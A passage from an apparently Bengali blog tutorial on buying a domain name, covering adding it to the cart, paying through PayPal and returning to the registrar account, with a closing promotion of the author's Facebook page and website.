কাঙ্খিত ডোমেইনটি নিবাচন করে Add To Cart এ ক্লিক করুন।
পর নিচের মত চিত্র আসবে।

Check out with PayPal বাটনে ক্লিক করুন। আপনি পেপালের নিজস্ব
পেজে রিডাইরেক্ট হবেন। লগইন করুন। নিদিষ্ট ডলার প্রদান করুন।
অতঃপর পুনরায় আপনার ডোমেইন রেজিষ্টারারের একাউন্টে প্রত্যাবতন
করুন। ব্যাস হয়ে গেল আপনার ডোমেইন কেনা। এখন আপনি যা ইচ্ছে
তাই করতে পারেন আপনার ডোমেইনকে নিয়ে কারন আপনিতো সাথে
পাচ্ছেন ফ্রি কন্ট্রোল প্যানেল এবং 24X7 Customer Support. কোন প্রশ্ন
থাকলে কমেন্ট করতে পারেন।
কঠিন হল না সহজ হল জানাবে কমেন্ট এর মাধ্যমে।
বি: দ্র: আমি বিষয় টি সহজ করে তুলে দরেছি আমি কপি করি নি তবে হ্যা অন্য লেখার সাহায্য নিয়েছিকম্পিউটার শিক্ষার জন্য সহজ টিউটরিয়াল পেতে facebook page টি লাইক করতে পারেন  আর আমার সাইট হল http://www.shobkeso.com (সবকিছু ডট কম)